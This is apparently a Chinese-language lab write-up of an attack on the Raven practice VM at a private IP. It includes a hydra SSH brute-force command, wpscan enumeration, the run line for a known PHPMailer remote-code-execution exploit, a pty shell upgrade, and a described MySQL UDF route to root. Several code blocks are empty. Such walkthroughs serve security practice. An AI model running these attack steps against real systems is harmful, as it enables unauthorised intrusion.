1 |
|
try1-ssh用户枚举
1 |
|
获得的用户:
1 |
|
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt -I 192.168.2.133 ssh
我猜弱口令应该已经修补了。但是还是得试一试,==,万一又有,我又没发现这么低级的漏洞,岂不是很没有面子。
try2-web enum
方法:
wpscan --url "http://192.168.2.133/wordpress/" --wp-content-dir "/wordpress" --enumerate u --enumerate p
信息:
1 |
|
1 |
|
searchsploit -m exploits/php/webapps/42221.py
1 |
|
see /root/42221.py
mv /root/42221.py rce_phpmailer_exim4.py
python rce_phpmailer_exim4.py -url http://192.168.2.133/ -cf contact.php -ip 192.168.2.133
时隔2个月,继续这个靶机的练习 192.168.241.128
command:
1 |
|
存在的目录:
http://raven.local/vendor/changelog.md http://raven.local/manual/en/index.html apache的目录
wordpress 4.8.7漏洞资料 https://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/version_id-224338/Wordpress-Wordpress-4.8.html
CVE-2018-20148:PHP Object Injection via Meta Data
info:
http://192.168.241.128/wordpress/?attachment_id=11 wpscan扫描了这个目录,获得flag3
http://raven.local/vendor/PATH 发现目录遍历,获得flag1
思路
无弱密码;有0day漏洞,但没有exp;无脆弱的wordpress插件
查看wp后,就是自己没有发现目录遍历漏洞=。=
http://raven.local/vendor/security.md 暗示了phpmailer插件版本漏洞
1 |
|
exp.sh
1 |
|
运行以上exp,成功获得一个webshell,权限为www-data
接下来用php反弹shell,如同这篇文章
python -c ‘import pty; pty.spawn(“/bin/bash”)’
之后,web目录泄露mysql密码,得到mysql普通权限。 然后上传udf源代码,执行安装,就可以使用do_system()函数,以root权限执行命令。 https://whale3070.github.io/training/2018/12/11/x/
总结
之前用searchsploit 找到了关于phpmailer的exp,php、bash、python的exp,都执行失败了。
看到过一个问题,web渗透该如何继续提升?除非遇到一样的web站点,该搞不下来的网站,还是搞不下来。
我认为应该用代码能力,写工具,尽可能扩大目标攻击面(只有知道,才能看到弱点),然后精力放在漏洞挖掘上。
而不是脚本小子运用已知exp对漏洞进行利用。
就好像我知道锁A、B、C,我有钥匙a,刚好Aa能配上,我就能进入系统。
经过验证,搞不下来的站点,除非有0day漏洞,那就证明了该站点很安全。
继续提升代码能力以及漏洞挖掘能力吧…